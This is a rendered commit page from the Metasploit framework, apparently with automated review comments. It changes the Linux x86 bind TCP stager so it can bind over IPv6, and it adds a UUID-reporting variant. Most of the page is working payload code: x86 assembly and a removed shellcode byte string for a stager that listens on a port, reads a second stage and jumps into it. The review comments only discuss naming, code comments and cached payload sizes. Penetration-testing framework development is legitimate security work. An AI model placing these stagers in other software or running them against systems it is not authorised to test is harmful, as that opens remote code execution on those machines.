Finalise work on the bind_ipv6_tcp stager for UUID support

bug/bundler_fix
OJ 2015-05-18 21:19:04 +10:00
parent 593f6e5fc4
commit e7f80042d4
3 changed files with 101 additions and 69 deletions


@ -46,6 +46,10 @@ module Payload::Linux::BindTcp
false
end
def use_ipv6
false
end
#
# Generate and compile the stager
#
@ -82,7 +86,13 @@ module Payload::Linux::BindTcp
def asm_bind_tcp(opts={})
#reliable = opts[:reliable]
encoded_port = "0x%.8x" % [opts[:port].to_i,2].pack("vn").unpack("N").first
af_inet = 2
if use_ipv6
af_inet = 0xa
end
encoded_port = "0x%.8x" % [opts[:port].to_i, af_inet].pack("vn").unpack("N").first
asm = %Q^
bind_tcp:
@ -99,7 +109,7 @@ module Payload::Linux::BindTcp
push ebx ; PROTO
inc ebx ; SYS_SOCKET and SOCK_STREAM
push ebx
push 0x2 ; SYS_BIND and AF_INET
push #{af_inet} ; SYS_BIND and AF_INET(6)
mov ecx,esp
mov al,0x66 ; socketcall syscall
int 0x80 ; invoke socketcall (SYS_SOCKET)
@ -124,15 +134,38 @@ module Payload::Linux::BindTcp
pop ebx
pop esi
^
if use_ipv6
asm << %Q^
push 2
pop ebx
push edx
push edx
push edx
push edx
push edx
push edx
push #{encoded_port}
mov ecx,esp
push 0x1c
^
else
asm << %Q^
push edx
push #{encoded_port}
push 0x10
^
end
asm << %Q^
push ecx
push eax
mov ecx,esp
push 0x66 ; socketcall syscall
pop eax
int 0x80 ; invoke socketcall (SYS_BIND)
shl ebx,1 ; SYS_LISTEN
mov al,0x66 ; socketcall syscall (SYS_LISTEN)
int 0x80 ; invoke socketcall
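Review bot: `encoded_port` is assigned twice in asm_bind_tcp — once with `[opts[:port].to_i,2].pack("vn")` and again with `[opts[:port].to_i, af_inet].pack("vn")` in the hunk at `@ -82,7 +86,13 @@`; the rendered page has lost the +/- markers, so if the first line is surviving context rather than a removed line it is a dead assignment that still hard-codes AF_INET. The `af_inet = 2` / `if use_ipv6` / `af_inet = 0xa` / `end` sequence reads more simply as `af_inet = use_ipv6 ? 0xa : 2`, and since the variable now holds AF_INET6 as well, a name such as `address_family` would keep it from reading as a contradiction next to `push #{af_inet} ; SYS_BIND and AF_INET(6)`. In the last hunk the `push 0x1c` and `push 0x10` before `push ecx` are the sockaddr lengths handed to bind; trailing comments `; sizeof(sockaddr_in6)` and `; sizeof(sockaddr_in)` would match the annotation style of the surrounding lines. The new `use_ipv6` hook in the first hunk carries no comment saying that IPv6 stagers override it; a one-line `# Overridden by IPv6 stagers to select the AF_INET6 sockaddr layout` above it would make that explicit. asm_bind_tcp's body continues past the end of the hunk.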


@ -1,87 +1,41 @@
##
# This module requires Metasploit: http://metasploit.com/download
# Current source: https://github.com/rapid7/metasploit-framework
##
require 'msf/core'
require 'msf/core/handler/bind_tcp'
require 'msf/core/payload/linux/bind_tcp'
# Linux Bind TCP/IPv6 Stager
module Metasploit3
module Metasploit4
CachedSize = 85
CachedSize = 110
include Msf::Payload::Stager
include Msf::Payload::Linux
include Msf::Payload::Linux::BindTcp
def self.handler_type_alias
"bind_ipv6_tcp"
'bind_ipv6_tcp'
end
def initialize(info = {})
super(merge_info(info,
'Name' => 'Bind TCP Stager (IPv6)',
'Description' => 'Listen for a connection over IPv6',
'Author' => [
'kris katterjohn', # original
'egypt', # NX support
],
'License' => MSF_LICENSE,
'Platform' => 'linux',
'Arch' => ARCH_X86,
'Handler' => Msf::Handler::BindTcp,
'Stager' => {
'Offsets' => { 'LPORT' => [ 0x18, 'n' ] },
'Payload' =>
"\x6a\x7d" +# push byte +0x7d
"\x58" +# pop eax
"\x99" +# cdq
"\xb2\x07" +# mov dl,0x7
"\xb9\x00\x10\x00\x00" +# mov ecx,0x1000
"\x89\xe3" +# mov ebx,esp
"\x66\x81\xe3\x00\xf0" +# and bx,0xf000
"\xcd\x80" +# int 0x80
"\x31\xdb" +# xor ebx,ebx
"\xf7\xe3" +# mul ebx
"\x53" +# push ebx
"\x43" +# inc ebx
"\x53" +# push ebx
"\x6a\x0a" +# push byte +0xa
"\x89\xe1" +# mov ecx,esp
"\xb0\x66" +# mov al,0x66
"\xcd\x80" +# int 0x80
"\x43" +# inc ebx
"\x52" +# push edx
"\x52" +# push edx
"\x52" +# push edx
"\x52" +# push edx
"\x52" +# push edx
"\x52" +# push edx
"\x68\x0a\x00\xbf\xbf" +# push dword 0xbfbf000a
"\x89\xe1" +# mov ecx,esp
"\x6a\x1c" +# push byte +0x1c
"\x51" +# push ecx
"\x50" +# push eax
"\x89\xe1" +# mov ecx,esp
"\x6a\x66" +# push byte +0x66
"\x58" +# pop eax
"\xcd\x80" +# int 0x80
"\xd1\xe3" +# shl ebx,1
"\xb0\x66" +# mov al,0x66
"\xcd\x80" +# int 0x80
"\x43" +# inc ebx
"\xb0\x66" +# mov al,0x66
"\x89\x51\x04" +# mov [ecx+0x4],edx
"\xcd\x80" +# int 0x80
"\x93" +# xchg eax,ebx
"\xb6\x0c" +# mov dh,0xc
"\xb0\x03" +# mov al,0x3
"\xcd\x80" +# int 0x80
"\x89\xdf" +# mov edi,ebx
"\xff\xe1" # jmp ecx
}
'Name' => 'Bind IPv6 TCP Stager (Linux x86)',
'Description' => 'Listen for an IPv6 connection (Linux x86)',
'Author' => [ 'kris katterjohn', 'egypt' ],
'License' => MSF_LICENSE,
'Platform' => 'linux',
'Arch' => ARCH_X86,
'Handler' => Msf::Handler::BindTcp,
'Convention' => 'sockedi',
'Stager' => { 'RequiresMidstager' => true }
))
end
def use_ipv6
true
end
end
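Review bot: The rewritten `'Author' => [ 'kris katterjohn', 'egypt' ]` line drops the per-author attribution the old list carried (`# original`, `# NX support`); keeping those as trailing comments costs nothing and records who did what. The `use_ipv6` override that replaces the hard-coded byte string has no comment tying it to the shared BindTcp stager; a YARD line such as `# @return [Boolean] true so the shared BindTcp stager emits the AF_INET6 sockaddr layout` would do. `CachedSize = 110` is now a hand-maintained number for a stager that is generated from assembly at runtime, so a comment on the constant saying it must be recomputed whenever the mixin's assembly changes would help the next maintainer. The rendered page has lost the +/- markers, so whether `include Msf::Payload::Linux` survives in the new file cannot be told from here; if it is removed, the module is relying on BindTcp to pull it in.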


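--- /dev/null
+++ b/<new-file path not shown on page>
@@ -0,0 +1,45 @@
+##
+# This module requires Metasploit: http://metasploit.com/download
+# Current source: https://github.com/rapid7/metasploit-framework
+##
+require 'msf/core'
+require 'msf/core/handler/bind_tcp'
+require 'msf/core/payload/linux/bind_tcp'
+module Metasploit4
+CachedSize = 110
+include Msf::Payload::Stager
+include Msf::Payload::Linux::BindTcp
+def self.handler_type_alias
+'bind_ipv6_tcp_uuid'
+end
+def initialize(info = {})
+super(merge_info(info,
+'Name' => 'Bind IPv6 TCP Stager with UUID support (Linux x86)',
+'Description' => 'Listen for an IPv6 connection with UUID support (Linux x86)',
+'Author' => [ 'kris katterjohn', 'egypt', 'OJ Reeves' ],
+'License' => MSF_LICENSE,
+'Platform' => 'linux',
+'Arch' => ARCH_X86,
+'Handler' => Msf::Handler::BindTcp,
+'Convention' => 'sockedi',
+'Stager' => { 'RequiresMidstager' => true }
+))
+end
+def use_ipv6
+true
+end
+def include_send_uuid
+true
+end
+end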
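Review bot: `CachedSize = 110` in this UUID variant is the same value the non-UUID bind_ipv6_tcp module declares in this commit, yet `include_send_uuid` returning true is the only thing that distinguishes the two; if that hook makes the shared stager emit additional UUID-sending instructions, as the commit title implies, one of the two cached sizes is stale. The two overrides at the bottom of the file are undocumented; `# @return [Boolean] true so the shared BindTcp stager uses the AF_INET6 sockaddr layout` above `use_ipv6` and `# @return [Boolean] true so the shared BindTcp stager includes its UUID-sending code` above `include_send_uuid` would make the contract visible. Both points can only be confirmed against the mixin's asm_bind_tcp, which lies outside this section.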